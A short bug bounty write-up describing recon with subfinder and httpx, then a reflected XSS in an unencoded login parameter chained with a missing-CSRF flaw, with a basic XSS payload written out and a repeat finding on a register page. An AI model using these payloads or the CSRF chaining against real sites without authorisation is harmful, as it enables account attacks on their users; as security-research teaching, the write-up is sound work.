How I get my first 3 bugs (Not duplicate :))

Hi , My name is Mohamed Yasser (Spider4).

This is my first write-up in bug hunting , I would expalin step by step how I get 3 valid bugs.

my target is a very wide scope, we would called it target.com.

First I used subfinder , you can configure it and add API-keys for more subs. If you don`t know how, this would help you An in-depth guide to subfinder: beginner to advanced (projectdiscovery.io)

subfinder -d target.com -all > subfinder.txt

Then I searched for live domains using Httpx:

cat subfinder.txt | httpx > httpx.txt

you can know more about httpx and its options by using -h .

I worked on this target for several days and found almost 4 bugs, but all of them were duplicates.

so I decided to search about things most of people don`t search about them, while hunting I found a login function so I opened the burp and intercept the request, I found that the request has hidden parameters and noticed that there is no CSRF tokens or any defense on CSRF attacks

So I decided to test for reflection and (username ,password ,module and pg) parameters are reflected.

After try special characters all of them are encoded except pg parameter has no encoding , so XSS will work successfully .

I tried basic payload :

“><img src=1 onerror=alert(‘Spider4’)>

and popup fired :)

until now this is a self XSS so you should chain it with CSRF to have an impact

you can make it from any CSRF-POC generator or from burp professional

The mistake made by the developer isn’t the only one, so you may find more bugs using the same technique.

so what about testing register page.

After testing I found the same bug but in another parameter called ettevote.